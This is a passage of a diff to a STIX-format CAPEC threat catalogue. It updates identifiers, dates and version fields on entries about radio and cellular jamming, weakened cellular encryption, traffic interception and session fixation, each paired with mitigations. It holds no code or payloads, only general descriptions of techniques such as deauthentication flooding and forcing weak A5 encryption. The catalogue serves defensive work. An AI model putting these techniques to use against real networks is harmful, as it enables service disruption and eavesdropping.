"object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--510720d5-243d-4ef7-8e77-919830690b16", - "source_ref": "course-of-action--bc58da04-f359-437e-8811-e14cc5294a4a", + "id": "relationship--7cfaadf0-8cef-4fc6-948c-b787bc4de4bd", + "source_ref": "course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-4", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encrypt the session data associated with the session ID.", "type": "course-of-action", - "id": "course-of-action--6617f354-07cb-4c10-a2fc-7a55c0d55e78" + "id": "course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--68e28209-96e5-42a7-b0be-91859d96a791", - "source_ref": "course-of-action--6617f354-07cb-4c10-a2fc-7a55c0d55e78", + "id": "relationship--c04c55ea-7aca-4a53-8dfa-41c78e806bbe", + "source_ref": "course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "name": "coa-60-5", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use multifactor authentication.", "type": "course-of-action", - "id": "course-of-action--94be6246-0dce-4f0d-b12b-d1c4ca1a5eb7" + "id": "course-of-action--767f4e01-7e92-4db1-84d7-851067a97406" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--01f5ca79-9541-4241-b89f-acc870c95ed9", - "source_ref": "course-of-action--94be6246-0dce-4f0d-b12b-d1c4ca1a5eb7", + "id": "relationship--171b92d3-4d57-42c4-bda5-f7f86528e143", + "source_ref": "course-of-action--767f4e01-7e92-4db1-84d7-851067a97406", "relationship_type": "mitigates", - "target_ref": "attack-pattern--300f3644-6613-4791-8242-505fbe7191ac" + "target_ref": "attack-pattern--d47faea4-b41f-494f-ab97-0e69b3029095" }, { "name": "Jamming", "description": "An adversary uses radio noise or signals in an attempt to disrupt communications. By intentionally overwhelming system resources with illegitimate traffic, service is denied to the legitimate traffic of authorized users.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36042,15 +36684,16 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--c0ff6de0-ab91-4c22-ad28-66b74fe3ecf6" + "id": "attack-pattern--1f0f0fdc-0bf2-45a8-8231-5e3789895f80" }, { "name": "DEPRECATED: Degradation", "description": "This attack pattern has been deprecated.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2017-05-01T00:00:00.000Z", @@ -36063,18 +36706,19 @@ ], "x_capec_abstraction": "Meta", "x_capec_status": "Deprecated", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--7e73b174-98cc-4305-a0d4-4a0aff839dc6" + "id": "attack-pattern--bae38550-a769-4b9a-9f24-9325b6c8f0ca" }, { "name": "Blockage", "description": "An adversary blocks the delivery of an important system resource causing the system to fail or stop working.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2017-08-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36094,15 +36738,16 @@ }, "x_capec_abstraction": "Standard", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--1320e681-58bd-4bb2-aec4-540736709d16" + "id": "attack-pattern--babc06ac-cf59-44cd-9f4a-d50771d486df" }, { "name": "Wi-Fi Jamming", "description": "In this attack scenario, the attacker actively transmits on the Wi-Fi channel to prevent users from transmitting or receiving data from the targeted Wi-Fi network. There are several known techniques to perform this attack \u2013 for example: the attacker may flood the Wi-Fi access point (e.g. the retransmission device) with deauthentication frames. Another method is to transmit high levels of noise on the RF band used by the Wi-Fi network.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36130,40 +36775,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ed1d5cbf-c9bf-4c4b-bbd8-abbea412610e" + "id": "attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-604-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Countermeasures have been proposed for both disassociation flooding and RF jamming, however these countermeasures are not standardized and would need to be supported on both the retransmission device and the handset in order to be effective. Commercial products are not currently available that support jamming countermeasures for Wi-Fi.", "type": "course-of-action", - "id": "course-of-action--e61f0e96-196f-4f8b-b0c7-26e8bba66de7" + "id": "course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--cbfbfc9a-74b6-4624-a31d-3267ae7995a3", - "source_ref": "course-of-action--e61f0e96-196f-4f8b-b0c7-26e8bba66de7", + "id": "relationship--feecba9f-ded0-410b-9f23-51c5b3b5dcae", + "source_ref": "course-of-action--aa9b1d83-23ff-490a-8b7d-17055a021877", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ed1d5cbf-c9bf-4c4b-bbd8-abbea412610e" + "target_ref": "attack-pattern--2fc90ec3-0e1b-46cb-a069-97f1aeb9530c" }, { "name": "Cellular Jamming", "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36188,40 +36834,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--b91db8d0-3f92-4703-826a-2d3cdc7f306c" + "id": "attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-605-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Mitigating this attack requires countermeasures employed on both the retransmission device as well as on the cell tower. Therefore, any system that relies on existing commercial cell towards will likely be vulnerable to this attack. By using a private cellular LTE network (i.e., a custom cell tower), jamming countermeasures could be developed and employed.", "type": "course-of-action", - "id": "course-of-action--47781839-ba8e-4248-a44e-d2dde9049d80" + "id": "course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--d6b64c18-9173-4f49-b88a-2eb047b6c4e0", - "source_ref": "course-of-action--47781839-ba8e-4248-a44e-d2dde9049d80", + "id": "relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444", + "source_ref": "course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73", "relationship_type": "mitigates", - "target_ref": "attack-pattern--b91db8d0-3f92-4703-826a-2d3cdc7f306c" + "target_ref": "attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4" }, { "name": "Weakening of Cellular Encryption", "description": "An attacker, with control of a Cellular Rogue Base Station or through cooperation with a Malicious Mobile Network Operator can force the mobile device (e.g., the retransmission device) to use no encryption (A5/0 mode) or to use easily breakable encryption (A5/1 or A5/2 mode).", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36251,65 +36898,66 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--4440689c-7870-402e-9486-bde9c9f351a6" + "id": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-606-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use of hardened baseband firmware on retransmission device to detect and prevent the use of weak cellular encryption.", "type": "course-of-action", - "id": "course-of-action--02d9c5d6-aac9-407b-b06d-69506c657622" + "id": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--abaa4d67-ffad-4dc8-83e1-1a2c3a1fb536", - "source_ref": "course-of-action--02d9c5d6-aac9-407b-b06d-69506c657622", + "id": "relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3", + "source_ref": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4440689c-7870-402e-9486-bde9c9f351a6" + "target_ref": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-606-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Monitor cellular RF interface to detect the usage of weaker-than-expected cellular encryption.", "type": "course-of-action", - "id": "course-of-action--e8153105-1858-47a9-8abb-ed9ebe57d924" + "id": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--40ec26c2-2d81-4e0f-b70f-9a075b3bb220", - "source_ref": "course-of-action--e8153105-1858-47a9-8abb-ed9ebe57d924", + "id": "relationship--896afb75-0f0d-4181-ae82-46c064633811", + "source_ref": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--4440689c-7870-402e-9486-bde9c9f351a6" + "target_ref": "attack-pattern--44cb2bc4-d57a-468d-a5c9-c98e01670204" }, { "name": "Obstruction", "description": "An attacker obstructs the interactions between system components. By interrupting or disabling these interactions, an adversary can often force the system into a degraded state or even to fail.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36327,15 +36975,16 @@ }, "x_capec_abstraction": "Meta", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--8e856e01-40b5-47a5-8626-bddf3ec9768c" + "id": "attack-pattern--12786e2f-db8b-4e95-989e-9f6c19357b7e" }, { "name": "Cryptanalysis of Cellular Encryption", "description": "The use of cryptanalytic techniques to derive cryptographic keys or otherwise effectively defeat cellular encryption to reveal traffic content. Some cellular encryption algorithms such as A5/1 and A5/2 (specified for GSM use) are known to be vulnerable to such attacks and commercial tools are available to execute these attacks and decrypt mobile phone conversations in real-time. Newer encryption algorithms in use by UMTS and LTE are stronger and currently believed to be less vulnerable to these types of attacks. Note, however, that an attacker with a Cellular Rogue Base Station can force the use of weak cellular encryption even by newer mobile devices.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36365,44 +37014,45 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--0fe4632b-4bfd-45b9-a20d-446c44196684" + "id": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--e40389c2-77d1-4fcc-8573-38c86e56d01b", - "source_ref": "course-of-action--02d9c5d6-aac9-407b-b06d-69506c657622", + "id": "relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac", + "source_ref": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0fe4632b-4bfd-45b9-a20d-446c44196684" + "target_ref": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--98b186af-696e-4b86-8559-278388cad762", - "source_ref": "course-of-action--e8153105-1858-47a9-8abb-ed9ebe57d924", + "id": "relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c", + "source_ref": "course-of-action--832091a4-e08f-4034-bb49-5c7f60cb32cf", "relationship_type": "mitigates", - "target_ref": "attack-pattern--0fe4632b-4bfd-45b9-a20d-446c44196684" + "target_ref": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c" }, { "name": "Cellular Traffic Intercept", "description": "Cellular traffic for voice and data from mobile devices and retransmission devices can be intercepted via numerous methods. Malicious actors can deploy their own cellular tower equipment and intercept cellular traffic surreptitiously. Additionally, government agencies of adversaries and malicious actors can intercept cellular traffic via the telecommunications backbone over which mobile traffic is transmitted.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "external_references": [ { "source_name": "capec", @@ -36420,7 +37070,7 @@ "None" ], "x_capec_skills_required": { - "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \u201crogue\u201d BTS stations is poor in many areas and it is assumed that \u201crogue\u201d BTS stations exist in urban areas." + "Medium": "Adversaries can purchase hardware and software solutions, or create their own solutions, to capture/intercept cellular radio traffic. The cost of a basic Base Transceiver Station (BTS) to broadcast to local mobile cellular radios in mobile devices has dropped to very affordable costs. The ability of commercial cellular providers to monitor for \"rogue\" BTS stations is poor in many areas and it is assumed that \"rogue\" BTS stations exist in urban areas." }, "x_capec_consequences": { "Confidentiality": [ @@ -36429,40 +37079,41 @@ }, "x_capec_abstraction": "Detailed", "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--ccee5dab-d84a-4897-87a0-a192a28b2038" + "id": "attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "name": "coa-609-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Encryption of all data packets emanating from the smartphone to a retransmission device via two encrypted tunnels with Suite B cryptography, all the way to the VPN gateway at the datacenter.", "type": "course-of-action", - "id": "course-of-action--4146c22e-0355-4bcb-8dc5-3451a82634b1" + "id": "course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2015-11-09T00:00:00.000Z", - "modified": "2019-04-04T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--292dbf79-3ee4-4928-be9b-8a3815e8924a", - "source_ref": "course-of-action--4146c22e-0355-4bcb-8dc5-3451a82634b1", + "id": "relationship--88df8824-2a9a-484a-a923-ab701e094915", + "source_ref": "course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20", "relationship_type": "mitigates", - "target_ref": "attack-pattern--ccee5dab-d84a-4897-87a0-a192a28b2038" + "target_ref": "attack-pattern--e7ba9615-51da-4376-b3b1-3f98ec19223a" }, { "name": "Session Fixation", "description": "The attacker induces a client to establish a session with the target software using a session identifier provided by the attacker. Once the user successfully authenticates to the target software, the attacker uses the (now privileged) session identifier in their own transactions. This attack leverages the fact that the target software either relies on client-generated session identifiers or maintains the same session identifiers after privilege elevation.", - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", @@ -36528,93 +37179,94 @@ "An attacker can hijack user sessions, bypass authentication controls and possibly gain administrative privilege by fixating the session of a user authenticating to the Management Console on certain versions of Macromedia JRun 4.0. This can be achieved by setting the session identifier in the user's browser and having the user authenticate to the Management Console. Session fixation is possible since the application server does not regenerate session identifiers when there is a change in the privilege levels. See also: CVE-2004-2182" ], "x_capec_status": "Draft", + "x_capec_version": "3.2", "type": "attack-pattern", - "id": "attack-pattern--22075d12-b668-4db7-a9a7-f46ac2978c13" + "id": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-61-0", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use a strict session management mechanism that only accepts locally generated session identifiers: This prevents attackers from fixating session identifiers of their own choice.", "type": "course-of-action", - "id": "course-of-action--708f442d-a9ea-4cd8-9892-896807a20135" + "id": "course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--667804aa-c5ce-4d3c-a0d2-9a60b3e2d727", - "source_ref": "course-of-action--708f442d-a9ea-4cd8-9892-896807a20135", + "id": "relationship--32443837-429a-488d-b2e1-0d00e309e10c", + "source_ref": "course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e", "relationship_type": "mitigates", - "target_ref": "attack-pattern--22075d12-b668-4db7-a9a7-f46ac2978c13" + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-61-1", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Regenerate and destroy session identifiers when there is a change in the level of privilege: This ensures that even though a potential victim may have followed a link with a fixated identifier, a new one is issued when the level of privilege changes.", "type": "course-of-action", - "id": "course-of-action--e112cf6b-8eb5-4129-b0fd-b8deb9ea5f8f" + "id": "course-of-action--95e7a500-58db-4a4b-8516-24b61e683322" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--aa736a0d-44ef-41c0-b42d-7d5e80e9c642", - "source_ref": "course-of-action--e112cf6b-8eb5-4129-b0fd-b8deb9ea5f8f", + "id": "relationship--58629d49-751c-4442-a4f8-e8650c594715", + "source_ref": "course-of-action--95e7a500-58db-4a4b-8516-24b61e683322", "relationship_type": "mitigates", - "target_ref": "attack-pattern--22075d12-b668-4db7-a9a7-f46ac2978c13" + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "name": "coa-61-2", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "description": "Use session identifiers that are difficult to guess or brute-force: One way for the attackers to obtain valid session identifiers is by brute-forcing or guessing them. By choosing session identifiers that are sufficiently random, brute-forcing or guessing becomes very difficult.", "type": "course-of-action", - "id": "course-of-action--bc38a430-e2ae-4636-8eae-2176526ba986" + "id": "course-of-action--28d4d037-94a9-4035-9477-678d3e0be043" }, { - "created_by_ref": "identity--a310da54-cad2-443b-8371-36e2df91ab5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", "created": "2014-06-23T00:00:00.000Z", "modified": "2018-07-31T00:00:00.000Z", "object_marking_refs": [ - "marking-definition--db13c800-5b49-4c0f-b51b-7f0ec4309951" + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" ], "type": "relationship", - "id": "relationship--5cb0c8b0-d5fa-45c8-a877-57020b42eea5", - "source_ref": "course-of-action--bc38a430-e2ae-4636-8eae-2176526ba986", + "id": "relationship--77174f86-8a8d-442b-a432-c71245fddf54", + "source_ref": "course-of-action--28d4d037-94a9-4035-9477-678d3e0be043", "relationship_type": "mitigates", - "target_ref": "attack-pattern--22075d12-b668-4db7-a9a7-f46ac2978c13" + "target_ref": "attack-pattern--11c647fb-33fc-444c-b578-617cb2205def" }, { "name": "Cellular Data Injection", "description": "Adversaries inject data into 